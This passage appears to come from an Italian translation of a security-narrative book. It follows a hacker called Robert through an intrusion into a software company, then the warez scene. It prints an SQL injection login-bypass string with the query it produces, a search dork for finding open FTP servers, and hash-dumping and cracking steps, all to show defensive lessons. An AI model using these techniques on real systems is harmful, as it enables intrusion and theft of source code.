postrofo, le virgolette e gli apici. Se non si filtrano questo gene- 
re di simboli, c'è il rischio di lasciare la porta aperta a utenti ma- 
lintenzionati che possono indurre l'applicazione a eseguire delle 
richieste al database opportunamente modificate, arrivando co- 
sì a mettere in crisi l'intero sistema. 

Robert si era reso conto che in effetti l'applicazione help- 


€ L’Assembler è un programma compilatore che traduce in linguaggio mac- 
china (composto da una serie di bit, 0 e 1) una serie di comandi scritti in lin- 
guaggio Assembly. Per questa sua vicinanza al linguaggio macchina, l’Assembly 
viene considerato un linguaggio di programmazione di basso livello. [N.d.7.] 

Elaborato negli anni settanta da Dennis Ritchie ai Bell Labs, C viene con- 
siderato invece un codice di alto livello. Questo perché la scrittura o la compila- 
zione delle istruzioni è indipendente dalla architettura del calcolatore su cui le 
istruzioni stesse saranno eseguite. [N.d.7.] 
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desk era stata sottoposta a controlli di sicurezza appropriati on- 
de evitare che qualcuno usasse Sql Injection. La maggior parte 
degli hacker avrebbero semplicemente uploadato uno script Asp 
sul web server e considerato chiusa la questione, ma a Robert in- 
teressava di più rimanere coperto che sfruttare una semplice vul- 
nerabilità per compromettere il proprio bersaglio. 


Pensai: “La cosa sembra interessante, questa storia promette bene, 
ci sarà da divertirsi”. 

E mi dissi: “Perfetto, abiliterò il Sql Injection disattivando il con- 
trollo di validità”. Trovai la stringa in cui erano elencati i caratteri 
non validi e li cambiai tutti con, credo, uno spazio o una tilde (~), o 
con qualcosa che non avrei usato ma che allo stesso tempo non avreb- 


be creato problemi a nessun altro. 


In altre parole Robert modificò il programma (usando un edi- 
tor esadecimale per “rompere” le routine create per verificare i da- 
ti immessi dall'utente) in modo che i caratteri speciali non venis- 
sero più rifiutati. Così, senza che nessuno se ne accorgesse, avreb- 
be potuto eseguire del Sql Injection senza che il comportamento 
dell’applicazione cambiasse per nessun altro. Un altro vantaggio 
consisteva nel fatto che era probabile che gli amministratori non 
avrebbero verificato l'integrità dell’applicazione helpdesk dal mo- 
mento che non vi erano segni evidenti di manipolazione. 

Robert inviò quindi la sua versione modificata dell’applica- 
zione helpdesk al web server, sostituendo la versione originale. 
Così come ci sono persone che collezionano francobolli, cartoli- 
neo scatole di fiammiferi dei posti in cui sono stati, così gli hacker 
a volte conservano non soltanto il bottino dei loro accessi non au- 
torizzati, ma anche il codice usato. Robert conserva ancora una 
copia in codice binario del file eseguibile che ha creato. 

Visto che stava lavorando da casa (coraggioso, e non racco- 
mandabile a meno che non vogliate essere arrestati), caricò la 
“nuova e migliorata” versione dell’applicazione del servizio di as- 
sistenza tecnica attraverso una catena di server proxy, server che 
agiscono come intermediari fra il computer dell'utente e quello 
cui si vuole accedere. Se un utente fa richiesta di una certa ri- 
sorsa a un computer “A”, questa richiesta arriva al server proxy, 
che effettua concretamente la richiesta, ottiene la risposta dal 
computer “A” e poi la gira al client del richiedente. 

Di solito i proxy vengono usati per accedere alle risorse del 
World Wide Web da dietro a un firewall. Robert incrementò il 
suo livello di sicurezza utilizzando vari proxy situati in varie par- 
ti del mondo per diminuire la probabilità di essere identificato. 
Normalmente i cosiddetti “proxy aperti” vengono usati in questo 
modo per mascherare l'origine di un cyberattacco. 

Con la sua versione modificata dell’applicazione helpdesk re- 
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golarmente funzionante sul server, Robert si collegò al sito pre- 
scelto usando il suo browser di navigazione. Quando gli si pre- 
sentò un modulo che gli richiedeva nome utente e password, lan- 
ciò un attacco standard di Sql Injection, secondo quanto aveva 
pianificato. In circostanze normali, dopo che l'utente ha inserito 
un nome e una password - per esempio “davids” e “218M296g” 
— l'applicazione usa questi dati per generare un'espressione Sql 
come la seguente: 


select record from users where user = ‘davids’ and password = 
‘z18M296g’ i 


Se il campo del nome utente e della password combaciano 
con i campi del database, allora l'utente viene identificato cor- 
rettamente. Questo è il modo in cui dovrebbe funzionare. Lat- 
tacco a Sql Injection elaborato da Robert andò invece in questo 
modo: nel campo del nome utente inserì 


‘or where password like’'% 
Come password inserì la stessa identica espressione: 
‘or where password like’% 


L'applicazione usò questi dati per generare un'espressione Sql 
simile alla seguente: 


select record from users where user = ‘ ‘or where password like ‘%’ 
and password = ‘ ‘or where password like ‘%' 


L'elemento or where password like ‘%' dice al Sql di rispon- 
dere alla richiesta se la password è qualunque cosa (il simbolo % 
funziona come un jolly). Vedendo che la password rispondeva a 
questo requisito senza senso, l'applicazione accettò Robert come 
utente legittimo, proprio come se avesse inserito delle credenziali 
autentiche. Quindi lo fece entrare autenticandolo come la prima 
persona elencata nel database degli utenti, di solito un ammini- 
stratore. Ed è appunto quello che successe: Robert non soltanto 
si ritrovò dentro, ma ebbe privilegi da amministratore. 

Nella posizione in cui si trovava, poteva vedere il messaggio 
del giorno che gli impiegati o gli altri utenti autorizzati vedono 
quando entrano nel sistema. Da una serie di altri messaggi raci- 
molò delle informazioni sui numeri da chiamare per connetter- 
si via modem alla rete interna e, in particolare, sui link per ag- 
giungere o rimuovere gli utenti dal gruppo Vpn sotto Windows. 
La società stava usando le applicazioni della Virtual Private 
Network di Microsoft, che è configurata in modo tale che i di- 
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pendenti possano entrare con i loro nomi utente e password di 
Windows. Visto che Robert era entrato nell’applicazione help-. 
desk come uno degli amministratori, aveva la possibilità di ag- 
giungere altri utenti al gruppo Vpn e cambiare le loro password 
per gli account Windows. 

Stava facendo progressi. Tuttavia fino a quel momento non 
aveva fatto altro che entrare in un'applicazione come ammini- 
stratore e questo non lo aveva avvicinato al codice sorgente che 
cercava. Il suo prossimo obiettivo era ottenere l’accesso alla rete 
interna attraverso la configurazione della Vpn. 

Giusto come prova, tramite il menu dell’helpdesk provò a cam- 
biare la password di quello che sembrava essere un utente poco 
attivo e lo aggiunse al gruppo degli amministratori; così era me- 
no probabile che la sua attività venisse notata. Verificò alcuni det- 
tagli della configurazione della Vpn “ed ero dentro. Funzionava 
bene, era solo un po’ lenta”. 


Entrai verso l'una di notte, ora locale. E andava benissimo visto che 
io avevo l'ora australiana. Sarà l'una di notte in America, ma qui è 
orario d'ufficio. Volevo entrare sicuro che la rete sarebbe stata vuo- 
ta, non volevo che ci fossero persone che potessero notarmi. Pote- 
vano avere un sistema di rilevamento di chi entrava. Semplicemen- 
te volevo essere tranquillo. 


Robert ha la sensazione di capire come lavorano i responsa- 
bili delle reti informatiche e della sicurezza, che non sono poi co- 
sì diversi da chiunque altro nel mondo del lavoro. “L'unico mo- 
do in cui mi avrebbero potuto notare [mentre ero online] sareb- 
be stato guardare continuamente nei loro log.” La sua conside- 
razione dei responsabili dell’It e della sicurezza non è partico- 
larmente lusinghiera: “I dipendenti non guardano i log ogni mat- 
tina. Quando arrivi alla tua scrivania, ti siedi, prendi un caffè, vi- 
siti alcuni siti che ti interessano. Non arrivi in ufficio per aprire 
i log e vedere se ieri qualcuno ha cambiato le password”. 

Una delle cose che ha notato nei suoi tentativi di hackerag- 
gio, dice Robert, è che “quando cambi qualcosa in un sito, o ti 
beccano subito o non ti beccano proprio. Il cambiamento che 
avevo fatto a quell’applicazione web sarebbe stato notato se aves- 
sero attivato qualcosa come Tripwire”, riferendosi a un’applica- 
zione che verifica l'integrità dei programmi di sistema e di altre 
applicazioni eseguendo un controllo crittografico della somma 
dei byte di ciascuno e confrontandola con una tabella di valori 
noti. “Si sarebbero accorti che il file eseguibile era cambiato.” 

A quel punto si sentiva più sicuro, citando l'ormai famoso slo- 
gan della “sicurezza M&M's”: dura fuori e morbida dentro. “A 
nessuno interessa se c'è qualcuno che sta dando un'occhiata nel- 
le loro reti, perché sei al di qua dei cancelli. Una volta che sei riu- 
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scito a penetrare nel recinto di sicurezza, sei libero di muoverti 
come se fossi a casa tua.” (Questa espressione significa: una vol- 
ta che l’autore di un attacco è dentro al sistema e usa le risorse 
come un qualunque utente autorizzato, è difficile rilevare la sua 
attività non autorizzata.) 

Scoprì che l'account di cui si era impadronito attraverso l'ap- 
plicazione helpdesk (cambiandone la password) gli permetteva 
di entrare nella rete attraverso il servizio di Vpn della Microsoft. 
Il suo computer era così collegato alla rete interna, come se stes- 
se utilizzando un computer connesso fisicamente alla rete in una 
delle sedi dell’azienda. 

Fino a quel momento era stato attento a non fare nulla che 
potesse lasciare delle tracce nei log di cui un amministratore co- 
scienzioso si sarebbe potuto accorgere, e si muoveva quindi in 
assoluta libertà. 

Si collegò alla rete interna e raccolse i nomi e i relativi indi- 
rizzi Ip dei computer Windows, trovando macchine con nomi co- 
me Finanze, Backup2, Web e Helpdesk. Ne rilevò altri che ave- 
vano nomi di persone, probabilmente le macchine di singoli di- 
pendenti. Su questo punto Robert ripeté una cosa già ricordata 
da altri in queste pagine. 

Quando si imbatté nei nomi dei server, si accorse che qual- 
cuno nell'azienda aveva un curioso senso dell'umorismo, co- 
mune a certi settori dell’high-tech. Questa moda era iniziata al- 
la Apple Computer all’inizio del suo successo. Steve Jobs, con 
la sua vena creativa e il suo approccio anticonformista, decise 
che le sale riunioni negli edifici dell'azienda non si sarebbero 
più chiamate 212A, Sala riunioni del sesto piano o in qualsiasi 
altro modo banale e noioso. Le stanze vennero ribattezzate con 
i nomi dei personaggi dei cartoni animati in un edificio, con 
quelli delle stelle del cinema in un altro e via dicendo. Robert 
notò che la sua software house aveva fatto qualcosa di simile 
con alcuni dei server, solo che, visto che era legata al cinema 
d'animazione, fra i nomi scelti c'erano quelli di personaggi fa- 
mosi dei cartoni animati. 

Tuttavia non fu un server con un nome curioso quello che at- 
tirò la sua attenzione, ma uno chiamato Backup2. La sua ricer- 
ca aveva prodotto una gemma: un’area aperta e condivisa della 
rete interna, chiamata Johnny, su cui alcuni dipendenti teneva- 
no le copie di backup di molti dei loro file. (Un’area condivisa, o 
“network share”, si riferisce a un hard disk, o una sua parte, in- 
tenzionalmente configurato per permettere l’accesso o la condi- 
visione dei file con altri.) Evidentemente chi amministrava il si- 
stema si sentiva piuttosto tranquillo e non particolarmente preoc- 
cupato per la sicurezza. Fra i vari file archiviati nella directory 
c'era addirittura una cartella personale dei file di Outlook, con- 
tenente una copia di tutte le e-mail. 
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Il pericolo delle copie di backup 


C'è un denominatore comune fra tutti noi: quando abbiamo 
bisogno di backup, non vogliamo la minima complicazione. Se 
c'è spazio, facciamo la copia di tutto! E poi ce ne dimentichiamo. 
Il numero di copie di backup che rimane in giro diventa così enor- 
me. La gente lascia che si accumulino, che aumentino e non si 
pensa mai a rimuoverle finché sul server o sul disco su cui le la- 
sciamo non finisce lo spazio disponibile. 

“Spesso,” osserva Robert, “la copia di sicurezza contiene infor- 
mazioni delicate, essenziali, sorprendenti, cui nessuno pensa sem- 
plicemente perché è un backup. Per questo viene trattata con un 
livello di sicurezza veramente basso.” (Nel mio primo periodo da 
hacker, quando ero giovane, notai la stessa cosa. Le aziende si de- 
dicavano con estrema puntigliosità alla protezione di certi dati, 
ma la copia di backup degli stessi veniva considerata poco im- 
portante. Mentre ero ricercato dalla polizia, lavorai per uno stu- 
dio legale che lasciava le copie di backup delle cassette in uno 
scatolone fuori dalla stanza protetta dei computer, perché venis- 
sero poi prese da un'impresa che le archiviava altrove. Chiunque 
avrebbe potuto rubare i nastri con un rischio minimo di essere 
scoperto.) Su Backup2 Robert notò un’area condivisa su cui qual- 
cuno aveva copiato tutte le sue cose, tutto di tutto. Robert si im- 
maginò come doveva essere successo e la storia suonerà fami- 
liare a molte persone: 


Questo tizio un giorno doveva aver avuto una gran fretta. Pensò: 
“Devo fare un backup”, e l'aveva fatto. Dopo circa tre o quattro me- 
si, il backup era ancora lì. 

Insomma, questo mi fece capire delle cose su questa rete e anche su 
come lavorava l'amministratore di sistema, perché non era un sem- 
plice sviluppatore o qualcuno senza particolari privilegi. Si trattava 
di qualcuno che poteva creare una cartella condivisa sulla rete in- ` 
terna, ma evidentemente i problemi di sicurezza non dovevano to- 
gliergli il sonno. 


Continua Robert: 


Se fosse stato uno con l'ossessione di proteggersi il culo come me, 
avrebbe messo una password su quella cartella e forse l'avrebbe chia- 
mata con un qualche nome casuale. E poi l'avrebbe rimossa. 


E ancora meglio, almeno dalla prospettiva di Robert, “tene- 
va pure una copia del suo Outlook lì”, con tutti gli indirizzi e i 
contatti. “Copiai tutti i file,” racconta, “recuperai il file Outlook.pst 
con tutte le sue e-mail, sui 130-140 Mb.” 

Chiuse la connessione e passò qualche ora a leggere le e-mail 


206 


di questo tipo. Scoprì “avvisi generali, modifiche ai pagamenti, 
note di rendimento, tutto su questa persona. Trovai un bel po’ di 
informazioni su di lui: era uno degli amministratori capo del si- 
stema informatico ed era responsabile di tutti i server Windows”, 
afferma Robert, “e grazie alla sua casella di posta fui in grado di 
sapere chi erano gli altri amministratori e chi aveva molti privi- 
legi di accesso”. Ma la cosa non era finita qui, anzi: 


Le informazioni trovate nella sua posta furono estremamente utili. 
Riuscii a stilare una lista di persone che probabilmente avevano ac- 
cesso al codice sorgente che volevo. Annotai tutti i loro nomi e tut- 
ti i dettagli possibili. Poi spulciai ancora ed effettuai una ricerca in 
tutto il file per la parola “password”; trovai un paio di sue registra- 
zioni, una delle quali con un'azienda di componenti per reti infor- 
matiche. 

Aveva aperto un account sul loro sito di supporto utilizzando il suo 
indirizzo di posta e una password, e aveva fatto lo stesso per due o 
tre venditori. Trovai le e-mail di risposta che dicevano: “Grazie per 
essersi registrato, il suo nome utente è questo, la sua password è 
quest'altra”. La password si chiamava “mypassword” per due azien- 
de diverse. 


Quindi, forse, ma solo forse, era la stessa password che usa- 
va al lavoro. La gente è pigra e quindi valeva decisamente la pe- 
na provare. 

Buona intuizione. La password funzionava per uno dei suoi 
account sul server dell’azienda, ma non era quello dell’ammini- 
stratore del dominio in cui Robert aveva sperato. Quella password 
gli avrebbe garantito l’accesso al database principale degli uten- 
ti che conserva il nome e la password crittata (hash) di ogni uten- 
te del dominio. L'amministratore aveva apparentemente un solo 
nome utente, ma diversi livelli di accesso a seconda che entras- 
se nell'intero dominio o sulla macchina locale. Robert aveva bi- 
sogno dell'accesso come amministratore del dominio per poter 
entrare nei sistemi più delicati dell'azienda, ma l’uomo usava ap- 
punto una password diversa per la sua identità di amministrato- 
re del dominio, una password che Robert non aveva. “Mi sentii 
veramente a pezzi,” ricorda con rammarico. 

L'intera faccenda si stava facendo abbastanza frustrante. “Tut- 
tavia pensai che alla fine avrei potuto trovare la password del- 
l’altro account semplicemente dando un’occhiata in giro ad altre 
risorse.” 

Poi la situazione prese una svolta positiva. Scoprì che Fa- 
zienda usava un’applicazione per la gestione dei progetti chia- 
mata Visual SourceSafe, e Robert riuscì a ottenere l’accesso al fi- 
le di password esterno, che apparentemente era leggibile da qua- 
lunque utente potesse entrare nel sistema. “Ci vollero forse una 
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settimana e mezza o due,” per attaccare il file di password con 
un software di decrittazione di parole chiave distribuito gratui- 
tamente, “con cui ottenni un’altra password usata dal mio uo- 
mo”. Aveva recuperato una seconda password usata dall'’ammi- 
nistratore che aveva pedinato. Era il momento di festeggiare: la 
password era quella usata per l'account di amministratore di do- 
minio, che diede a Robert l'accesso a tutti gli altri server in cui 
voleva entrare. 


Alcune osservazioni sulle password 


Le password, afferma Robert, sono cose molto personali. “E 
le aziende molto attente si riconoscono perché danno a ognuno 
una password diversa e tale password è molto rigorosa. D'altro 
canto, puoi riconoscere le aziende più lassiste dal fatto che la 
password preassegnata è un giorno della settimana o il nome del- 
l'azienda o qualcosa di altrettanto stupido.” 

(Robert mi confida che, nella società per cui lavora, la pass- 
word di ogni dipendente viene stabilita secondo il giorno della 
settimana in cui ha cominciato a lavorare. Quando provi ad au- 
tenticarti, “hai sette tentativi a disposizione prima che il sistema 
ti blocchi l'accesso e ovviamente a te non ne servono più di cin- 
que” se stai cercando di entrare nell’account di qualcuno.) 

Robert scoprì che molti degli account dell'azienda che cer- 
cava di compromettere avevano una password preassegnata com- 
posta nel modo seguente: 


nome dell’azienda-2003 


Non ne aveva trovato nessuno con “2002” o date precedenti, 
così era ovvio che erano state tutte cambiate il primo dell’anno. 
Una gestione delle password davvero ingegnosa! 


Ottenere l'accesso completo 


Robert sentiva che si stava avvicinando sempre più al suo 
obiettivo. Armato della seconda password di amministratore che 
aveva ottenuto impadronendosi della sua identità elettronica, ora 
aveva accesso agli hash delle password dell’intero dominio. Uti- 
lizzò il software PwDump2 per estrarre gli hash dal controller del 
dominio primario e LOphtCrack n per craccare la maggior par- 
te delle password. 

(L'ultimo bel trucco consiste nell'usare le Rainbow Tables, che 
sono le tabelle degli hash e delle relative password. Esiste un sito 
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- http://sarcaprj.wayreth.eu.org — che cerca di craccare gli hash 
delle password per conto vostro. Inserite semplicemente gli ha- 
sh del Lan Manager, di Nt e il vostro indirizzo e-mail, e ricevere- 
te un'e-mail con le password. Spiega Robert: “Hanno pregenera- 
to certi hash basandosi sui gruppi di caratteri usati più frequen- 
temente per costruire una password. Così, invece di aver bisogno 
di grandi capacità di calcolo, loro hanno 18 o 20 Gb di hash pre- 
generati con le password corrispondenti. Per un computer ci vuo- 
le veramente poco per passare in rassegna gli hash precalcolati e 
trovare le corrispondenze chiedendo: ‘Sei questa? Sei questa? O 
quest'altra? Ok, sei questa’”. Un attacco che utilizza le Rainbow 
Tables riduce il tempo del crack a pochi secondi.) 

Quando LOphtCrack ebbe finito, Robert aveva praticamente le 
password di tutti gli utenti del dominio. A quel punto, grazie alle 
informazioni contenute nelle e-mail di cui si era impossessato in 
precedenza, aveva messo insieme un elenco di persone che si era- 
no scambiate messaggi con l'amministratore di sistema. Uno di 
questi proveniva da un dipendente che aveva scritto lamentando- 
si di un server che si era guastato: “Non riesco a salvare nessuna 
nuova revisione e non posso quindi sviluppare il codice”. Era evi- 
dentemente uno sviluppatore, un'informazione preziosa. Robert 
controllò quindi il suo nome utente e la sua password. 

Si collegò e si autenticò con le credenziali dello sviluppatore. 
“Entrando come se fossi lui, avevo accesso a tutto senza restri- 
zioni.” 

E “tutto” in questo caso significa soprattutto il codice sor- 
gente del prodotto: “Erano le chiavi del regno”. Ed erano sue. “Io 
volevo rubare il codice sorgente. E lì c’era tutto quello che vole- 
vo,” racconta contento. 


Recapitare il codice a casa propria 


Robert aveva visto luccicare loro che stava cercando. Ma do- 
veva ancora trovare un modo, un modo sicuro, per farselo reca- 
pitare a domicilio. “Erano dei file belli grossi,” dice. “Penso che 

‘l’intera struttura del codice sorgente fosse attorno a 1 Gb. Caz- 
zo, ci avrei messo settimane.” 

(Tutto questo non era neanche lontanamente paragonabile a 
quello che avevo fatto io anni prima, quando avevo copiato cen- 
tinaia di Mb di codice sorgente di Vms dalla Digital Equipment 
Corporation utilizzando un modem da 14.4 K.) 

Poiché il codice sorgente era di tali dimensioni, voleva una 
connessione molto più veloce per spedirlo. E voleva che seguis- 
se un percorso che rendesse difficile risalire facilmente a lui. La 
connessione veloce non era un gran problema. Tempo prima era 
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entrato in un’altra azienda negli Stati Uniti che usava Citrix Me- 
taFrame, un altro di questi obiettivi facili che si trovano in rete. 

Robert aprì una connessione Vpn nell'azienda che stava at- 
taccando e identificò il percorso che portava al disco su cui ri- 
siedeva il codice sorgente. Lo copiò semplicemente: “Usai il ser- 
ver Citrix per collegarmi di nuovo in Vpn alla rete [dell'azienda 
produttrice del software], poi seguii il percorso fino all’area con- 
divisa. Quindi copiai l’intero codice sorgente, i binari e altri dati 
sul server Citrix disponibile”. 

Per trovare una via per portare a destinazione i file in modo 
sicuro e impossibile da tracciare (almeno così sperava), usò il mo- 
tore di ricerca che anch'io prediligo, Google, per individuare un 
server Ftp anonimo, che permette a chiunque di caricare e sca- 
ricare file in una cartella di accesso pubblico. Inoltre stava cer- 
cando un server Ftp anonimo le cui cartelle fossero accessibili 
anche via http (usando un browser). Pensò che usando un server 
Ftp anonimo la sua attività sarebbe finita “sepolta nel rumore di 
fondo”, dato che moltissima altra gente avrebbe usato lo stesso 
server per scambiare porno, software craccati, musica e film. 

Le parole chiave che inserì in Google furono le seguenti: 


index of parent incoming inurl:ftp 


Questa stringa di ricerca cerca i server Ftp che consentono 
l’accesso anonimo. Dei server identificati dalla ricerca di Google, 
ne selezionò uno che rispondesse al criterio menzionato di down- 
load via http, in modo da poter scaricare il codice direttamente 
dal suo browser. 

Con i file già trasferiti dall'azienda produttrice al server Ci- 
trix manomesso, Robert non fece che rispostarli sul server Ftp 
anonimo che aveva individuato con Google. 

Gli rimaneva ora un ultimo passo da compiere prima di met- 
tere finalmente le mani sul prezioso codice sorgente: trasferire i 
file dal server Ftp al suo computer. “Alla fine della giornata non 
voglio che il mio indirizzo Internet stia scaricando tutto quel co- 
dice sorgente e soprattutto non per ore e ore, non so se mi spie- 
go.” Così, dopo aver trasferito i file al server Ftp, li zippò in un 
pacchetto più piccolo e con un nome innocente (“regalo.zip o 
qualcosa del genere”). 

Utilizzò ancora una volta una catena di server proxy aperti 
per far rimbalzare la sua connessione in modo che sarebbe sta- 
ta difficile da tracciare. Spiega Robert: “Ci sono circa un centi- 
naio di server proxy aperti di tipo Socks? nella sola Taiwan e in 


8 Socks è un’abbreviazione di “Socket Secure”. Si tratta di un software per 
firewall che stabilisce una connessione dall’interno del firewall verso l'esterno 
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un qualsiasi momento ci sono di media un centinaio di persone 
su ognuno di quei proxy”. Quindi, ammesso che abbiano abilita- 
to il registro degli accessi, i log saranno realmente file molto gran- 
di, e questo significa che è altamente improbabile che gli uomi- 
ni del governo riescano a seguire le tracce fino ad arrivare a bus- 
sare a casa di un hacker. “Sei come un ago in un pagliaio. Sem- 
plicemente è troppo complicato.” 

Finalmente, dopo tanto sforzo, il trasferimento si stava rea- 
lizzando: 


Non riuscivo a credere che il codice si stesse davvero scaricando sul 
mio computer. Fu davvero una grossa emozione. 


Condivisione: il mondo del cracker 


Cosa fa un hacker come Erik o Robert una volta che ha mes- 
so le mani sul software tanto ambito? Per entrambi, e per molti 
che possono essere definiti “cracker” o “pirati del software”, la ri- 
sposta è che nella maggior parte dei casi condividono il soft- 
ware piratato con molte, molte altre persone. 

Ma questa condivisione avviene in modo indiretto, 

Erik ci ha spiegato cosa fece dopo essere riuscito a mettere 
le mani sul software per server che per due anni aveva inseguito 
disperatamente. L'applicazione era stata scritta in un linguaggio 
di programmazione in cui non era molto bravo, ma Erik aveva 
un amico che aveva programmato in quel linguaggio, che gli pas- 
sò il codice sorgente insieme al keygen del prodotto, il software 
per generare lo sblocco o il codice di registrazione per aggirare i 
controlli di sicurezza sulla licenza. Li compilò entrambi: 


Lo diedi a un’altra persona che lo uploadò su uno dei nodi della di- 
stribuzione dei warez, compattò il tutto in un pacchetto, inserì il 
keygen e creò i file di documentazione con le istruzioni su come in- 
stallare e craccare il software. Non lo pubblicai io direttamente. 


Quando furono pronti a uploadare il programma e il keygen, 
controllarono prima se qualcun altro potesse aver già craccato lo 
stesso programma: 


Prima di pubblicare qualcosa bisogna essere sicuri che nessun altro 
l'abbia già fatto, quindi si fa una “prova dello scemo” per essere si- 
curi che sia unico. 


quando una connessione diretta verrebbe altrimenti impedita dal software del fi- 
rewall o dall’hardware (per esempio dalla configurazione del router). Vedi 
http:/www.auditmypc.com/acronym/SOCKS.asp. [N.d.T.] 
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Fare una “prova dello scemo” è facile. L'autore del crack va 
semplicemente su http://www.dupecheck.ru (il sito si trova in Rus- 
sia) e inserisce il nome e la versione del prodotto. Se risulta nel- 
l'elenco vuol dire che qualcun altro lha già craccato e pubblica- 
to su uno dei nodi della distribuzione dei warez. 

Ma solo perché il software è stato pubblicato su uno di que- 
sti siti non significa che chiunque lo possa scaricare. Anzi, il si- 
to avvisa in modo molto esplicito: 


Questo è un gruppo chiuso per cui andate a fare in c... 


(Ovviamente sul sito trovate tutte le lettere mancanti.) 

D'altra parte, se si tratta di un prodotto in commercio e non 
ancora sulla lista, significa che l’autore del crack ha messo a se- 
gno un gran colpo. Può essere il primo a uploadare la versione 
craccata di quel software. 

Una volta che il nuovo pacchetto viene uploadato, la distri- 
buzione - secondo la descrizione di Erik - comincia molto rapi- 
damente: 


Ci saranno qualcosa come cinquanta nodi principali di warez nel 
mondo, siti privati Ftp. Metti il software su uno di questi siti e nel 
giro di un'ora circa viene replicato da quel sito a migliaia di altri in., 
tutto il mondo tramite dei corrieri. 

Dalle cinquanta alle duecento volte al giorno, forse. Diciamo pro- 
babilmente cento, questa è su per giù una media attendibile. Un cen- 
tinaio di programmi al giorno vengono piratati in questo modo. 


Un corriere, spiega Erik, è una persona che sposta “la roba” da 
un sito di cracking a un altro. I corrieri sono “il primo livello del- 
la catena alimentare” sotto alle persone che craccano il software: 


I corrieri tengono d'occhio tre o quattro siti differenti. Non appena 
qualcuno carica [un'applicazione craccata] sul sito warez, e loro ca- 
piscono che si tratta di qualcosa di nuovo, la scaricano e la inviano 
a tre o quattro siti il più velocemente possibile. 

Ora, a questo punto, ci sono forse venti siti che ce l'hanno. A volte 
questo può accadere anche due o tre mesi prima che il nuovo soft- 
ware arrivi nei negozi. 


La serie successiva di corrieri sono persone che non hanno 
ancora ottenuto l’accesso ai nodi principali della distribuzione 
warez: individuano il nuovo articolo e passano il più velocemen- 
te possibile per lo stesso processo di scaricamento e caricamen- 
to su quanti più siti possono, cercando di essere i primi. “E si 
diffonde a cascata in questo modo e nel giro di un’ora ha fatto 
due volte il giro del mondo.” 

Alcuni ottengono accesso ai siti warez attraverso un sistema 
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di crediti, spiega Erik. I crediti sono una sorta di moneta dei 
cracker che si guadagna contribuendo all’obiettivo del sito, che 
è appunto la distribuzione di software craccato. Il cracker nor- 
malmente fornisce sia il programma che lo strumento per gene- 
rare un codice valido di licenza o qualche altro tipo di soluzione 
temporanea. 

Un cracker riceve dei crediti quando è il primo a uploadare 
il “crack” su un sito che ancora non ce l’ha. Solo la prima perso- 
na che carica la nuova applicazione su un certo sito riceve dei 
crediti: 


Sono quindi molto motivati a farlo rapidamente. Perciò in un istan- 
te lo vedi dappertutto. A quel punto la gente lo copia sui propri siti 
di crack o sui newsgroup. 

Le persone come me che craccano questa roba ottengono accesso 
illimitato per sempre. Se sei un cracker vogliono che continui a con- 
tribuire con della roba buona quando sei il primo ad averla. 


Alcuni siti hanno il programma completo e il keygen. “Ma 
molti dei siti di crack,” spiega Erik, “non includono il program- 
ma, ma solo il keygen, per rendere i file più leggeri e abbassare 
la probabilità che i federali chiudano il sito.” 

In tutti questi siti, non solo i nodi del livello più alto della di- 
stribuzione di warez, ma anche in quelli a due o tre livelli più giù, 
è “difficile entrare. Sono tutti privati” perché se si venisse a co- 
noscere uno degli indirizzi del sito, “i federali non solo lo chiu- 
derebbero, ma arresterebbero tutti, sequestrerebbero i loro com- 
puter e arresterebbero chiunque sia mai stato su quel sito”, per- 
ché questi siti Ftp dopotutto sono magazzini di ingenti quantità 
di beni intellettuali rubati: 


Su questi siti non ci vado neanche più. O meglio, ci vado raramen- 
te a causa del rischio che comporta. Ci posso andare quando ho bi- 
sogno di un certo software, ma io non uploado mai le mie cose. 
In realtà è davvero interessante perché è estremamente efficiente. 
Voglio dire, quale altro settore ha un sistema di distribuzione come 
questo, in cui tutti sono motivati perché tutti vogliono qualcosa? 
Come cracker ricevo inviti ad accedere a tutti questi siti dal mo- 
mento che tutti vogliono dei buoni cracker per riuscire così ad ave- 
re più corrieri. E i corrieri vogliono avere accesso ai siti di qualità 
perché è lì dove possono prendere la roba migliore. 

Il mio gruppo non fa entrare più nessuno. Inoltre ci sono certe cose 
che non pubblichiamo. Come quella volta, un'estate, quando pubbli- 
cammo Microsoft Office, fu semplicemente troppo rischioso. Dopo 
quella volta decidemmo di lasciar perdere le marche più importanti. 
Alcuni cominciano a fare casino, ci vanno giù pesante e si mettono 
a vendere i cd. Soprattutto quando cominciano a farlo per soldi, al- 
lora si attira troppo l’attenzione. Sono quelli che di solito vengono 
arrestati. 
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Adesso, come per tutta questa storia sul software, lo stesso tipo di 
fenomeno succede con la musica e i film. Su alcuni siti a volte puoi 
arrivare ai film due o tre settimane prima che escano in sala. In quel 
caso, di solito, c'è dietro qualcuno che lavora nella distribuzione o 
nella duplicazione. È sempre qualcuno che agisce da dentro. 


Considerazioni 


La lezione contenuta nella storia del giovane Erik e della sua 
ricerca dell'ultimo pacchetto di software che gli mancava per com- 
pletare la sua collezione è che in natura la perfezione sembra non 
esistere, ed è ancora più vero quando c'entrano degli esseri uma- 
ni. L'azienda che aveva preso di mira era estremamente attenta 
alla sicurezza e aveva fatto un ottimo lavoro per proteggere i pro- 
pri sistemi informatici. Tuttavia, è praticamente impossibile te- 
nere alla larga un hacker che è sufficientemente competente, de- 
terminato e disposto a perderci il tempo necessario. 

Ah, certo, probabilmente sarete così fortunati da non avere 
di fronte qualcuno così determinato come Erik e Robert, dispo- 
sto a investire un'enorme quantità di tempo ed energie per at- 
taccare il vostro sistema. Ma se invece ci fosse un concorrente 
senza scrupoli che assume una squadra di professionisti dell’un- 
derground, un gruppo di hacker mercenari disposti a dedicarci 
dodici o quattordici ore al giorno, e che amano questo lavoro? 

E se gli autori dell'attacco trovassero davvero una crepa nel- 
l'armatura elettronica della vostra organizzazione, cosa fareste? 
Secondo Erik, “quando qualcuno entra nella tua rete nel modo in 
cui sono entrato io in quella rete, non riuscirai mai, mai e poi mai 
a sbatterlo fuori. Se ne resterà lì per sempre”. Sostiene che ci vor- 
rebbe “una revisione completa di tutto, si dovrebbero cambiare tut- 
te le password lo stesso giorno e alla stessa ora, reinstallare tutto, 
e poi rendere tutto sicuro di nuovo nello stesso istante per chiu- 
derlo fuori”. E andrebbe fatto tutto senza dimenticare niente. “La- 
scia una sola porta aperta e rientrerò all'istante.” 

La mia esperienza personale conferma questa opinione. Quan- 
do ero alle superiori, hackerai l'Easynet della Digital Equipment 
Corporation. Loro sapevano di avere dentro un intruso, ma per 
otto anni le migliori menti del loro dipartimento di sicurezza non 
riuscirono a tenermi fuori. Alla fine si liberarono di me non gra- 
zie ai loro sforzi, ma perché il governo era stato così gentile da 
offrirmi un soggiorno completo presso uno dei suoi villaggi va- 
canze federali. 
